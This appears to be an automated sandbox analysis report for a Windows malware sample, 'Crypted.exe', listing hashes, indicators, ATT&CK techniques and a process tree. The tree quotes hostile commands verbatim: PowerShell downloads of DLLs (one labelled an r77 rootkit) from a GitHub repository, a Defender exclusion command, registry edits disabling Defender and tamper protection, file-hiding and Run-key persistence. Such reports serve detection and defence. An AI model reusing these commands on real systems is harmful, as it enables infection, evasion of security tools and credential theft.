Analysis
-
max time kernel
151s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
28-07-2024 19:57
Static task
static1
Behavioral task
behavioral1
Sample
Crypted.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Crypted.exe
Resource
win10v2004-20240709-en
General
-
Target
Crypted.exe
-
Size
50KB
-
MD5
5dd57385d3af83d5a7160e9c14aa09f5
-
SHA1
64aabb5a9d77cbb8768779c7f3d0231465ea29f0
-
SHA256
1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a
-
SHA512
05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5
-
SSDEEP
1536:5GuV08a0ep7+bYrVNXUsyWSBY99w399hVkrf1t0:bYrVOsyWSBY99kq5W
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/SInject2.dll
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/452-1-0x00000000000A0000-0x00000000000B2000-memory.dmp disable_win_def behavioral2/files/0x000b000000023387-9.dat disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" $77-caca.exe.exe -
r77 rootkit payload 1 IoCs
Detects the payload of the r77 rootkit.
resource yara_rule behavioral2/files/0x000c000000023471-67.dat r77_payload -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 42 1084 powershell.exe 43 668 powershell.exe 45 668 powershell.exe 46 1084 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" certutil.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2268 attrib.exe 1148 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation Crypted.exe Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation $77-caca.exe.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe $77-caca.exe.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe $77-caca.exe.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sjava.vbs $77-caca.exe.exe -
Executes dropped EXE 1 IoCs
pid Process 4964 $77-caca.exe.exe -
Loads dropped DLL 5 IoCs
pid Process 1260 Process not Found 4136 Process not Found 588 Process not Found 4212 vssvc.exe 1908 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" $77-caca.exe.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe" $77-caca.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe" $77-caca.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\$77-caca.exe.exe" $77-caca.exe.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA $77-caca.exe.exe -
pid Process 668 powershell.exe 1084 powershell.exe 1472 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 44 raw.githubusercontent.com 45 raw.githubusercontent.com 46 raw.githubusercontent.com -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf $77-caca.exe.exe File opened for modification C:\autorun.inf $77-caca.exe.exe File created F:\autorun.inf $77-caca.exe.exe File opened for modification F:\autorun.inf $77-caca.exe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-caca.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 668 powershell.exe 668 powershell.exe 1084 powershell.exe 1084 powershell.exe 1084 powershell.exe 4220 powershell.exe 1472 powershell.exe 4220 powershell.exe 1472 powershell.exe 4212 vssvc.exe 4212 vssvc.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 668 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 4220 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeBackupPrivilege 4212 vssvc.exe Token: SeRestorePrivilege 4212 vssvc.exe Token: SeAuditPrivilege 4212 vssvc.exe Token: SeDebugPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe Token: 33 4964 $77-caca.exe.exe Token: SeIncBasePriorityPrivilege 4964 $77-caca.exe.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 452 wrote to memory of 4876 452 Crypted.exe 91 PID 452 wrote to memory of 4876 452 Crypted.exe 91 PID 452 wrote to memory of 4876 452 Crypted.exe 91 PID 4876 wrote to memory of 2268 4876 cmd.exe 93 PID 4876 wrote to memory of 2268 4876 cmd.exe 93 PID 4876 wrote to memory of 2268 4876 cmd.exe 93 PID 452 wrote to memory of 4592 452 Crypted.exe 95 PID 452 wrote to memory of 4592 452 Crypted.exe 95 PID 452 wrote to memory of 4592 452 Crypted.exe 95 PID 952 wrote to memory of 4964 952 explorer.exe 97 PID 952 wrote to memory of 4964 952 explorer.exe 97 PID 952 wrote to memory of 4964 952 explorer.exe 97 PID 4964 wrote to memory of 1068 4964 $77-caca.exe.exe 101 PID 4964 wrote to memory of 1068 4964 $77-caca.exe.exe 101 PID 4964 wrote to memory of 1068 4964 $77-caca.exe.exe 101 PID 1068 wrote to memory of 1148 1068 cmd.exe 103 PID 1068 wrote to memory of 1148 1068 cmd.exe 103 PID 1068 wrote to memory of 1148 1068 cmd.exe 103 PID 4964 wrote to memory of 4648 4964 $77-caca.exe.exe 106 PID 4964 wrote to memory of 4648 4964 $77-caca.exe.exe 106 PID 4964 wrote to memory of 4648 4964 $77-caca.exe.exe 106 PID 4648 wrote to memory of 668 4648 cmd.exe 108 PID 4648 wrote to memory of 668 4648 cmd.exe 108 PID 4648 wrote to memory of 668 4648 cmd.exe 108 PID 4964 wrote to memory of 3484 4964 $77-caca.exe.exe 109 PID 4964 wrote to memory of 3484 4964 $77-caca.exe.exe 109 PID 4964 wrote to memory of 3484 4964 $77-caca.exe.exe 109 PID 4964 wrote to memory of 2720 4964 $77-caca.exe.exe 113 PID 4964 wrote to memory of 2720 4964 $77-caca.exe.exe 113 PID 4964 wrote to memory of 2720 4964 $77-caca.exe.exe 113 PID 2720 wrote to memory of 1084 2720 cmd.exe 116 PID 2720 wrote to memory of 1084 2720 cmd.exe 116 PID 2720 wrote to memory of 1084 2720 cmd.exe 116 PID 4964 wrote to memory of 1472 4964 $77-caca.exe.exe 117 PID 4964 wrote to memory of 1472 4964 $77-caca.exe.exe 117 PID 4964 wrote to memory of 1472 4964 $77-caca.exe.exe 117 PID 4964 wrote to memory of 4220 4964 $77-caca.exe.exe 119 PID 4964 wrote to memory of 4220 4964 $77-caca.exe.exe 119 PID 4964 wrote to memory of 4220 4964 $77-caca.exe.exe 119 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2268 attrib.exe 1148 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Crypted.exe"C:\Users\Admin\AppData\Local\Temp\Crypted.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2268
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\ProgramData\caca\$77-caca.exe.exe2⤵
- System Location Discovery: System Language Discovery
PID:4592
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\ProgramData\caca\$77-caca.exe.exe"C:\ProgramData\caca\$77-caca.exe.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
-
C:\Windows\SysWOW64\certutil.execertutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin3⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\caca\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1AppInit DLLs
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1AppInit DLLs
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD55dd57385d3af83d5a7160e9c14aa09f5
SHA164aabb5a9d77cbb8768779c7f3d0231465ea29f0
SHA2561f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a
SHA51205eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5
-
Filesize
147KB
MD51b8bd653321cf3cbc786e563555fbc75
SHA15638efe0476c8c1b74c6604db419be814d1d90a0
SHA256919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7
SHA512bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
18KB
MD550b575e6b02913252e3a2df518101be4
SHA1c2fed8ada6c98c07ce47523d244e11f8cc2758d3
SHA256a261c594e893e49f4b574cdb3e6380d4f307c59f6a464d63f5ba2719431d3abe
SHA512933642c7d76776567c3507978815c0e0ee04a3c97a768cabdeea40de5b06053673eb1bba6d91969e8ad9c3936341aae65715cede1dccf8dd21cc644f076fda3d
-
Filesize
16KB
MD59b2e286cf260bc915018f518126b98da
SHA1c299707268a78df145c95d40a3a98cdf4defb1f9
SHA256e15eb3bf99b8b1b4a9a0d1e81a0b17d4b02ab1bc83b9e601b021df42f0cff0a5
SHA512388221abb921b9b8c42f01c0b65e1393e8c21b87956302ec266896270d71ce668b6a57255447c9370de40cb770e7ae95c92877d99d3f00ff40071452479b7463
-
Filesize
239B
MD5bc94713ed3b066dd0b60662b14eec576
SHA1b4ea97adaa702810331946bbca2672f6f0b4f7b9
SHA25608b73777133ce66a50936efea485a6d4f96f228247390bf7fc4d4108f22da8ef
SHA51200e5829aa6352649899d19485c0074980aff51685c9d7667bf051db62ee76e1e38f49ca03e60d3c757cb0f657112efe736ba60dbc1fda0f8e4f0f62a28fc4c45
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
257B
MD5b09cfef3a4b4ad3d325e1da75298680d
SHA1d78f29730c04b5d340b79ea63478488b087c01dd
SHA25634e94c47c49e449f2b6ab4bb8157e47e538a72b46d2e4a548aa45c14546a9c26
SHA512ff84e6abedf2aa20df541a2cd4043bb8eaacb0409d532f5b7d13869827c90b2cb122b86380332f0e191e2ce78eed5add29ad5635e5f9c54e31d0ad85baa6bdda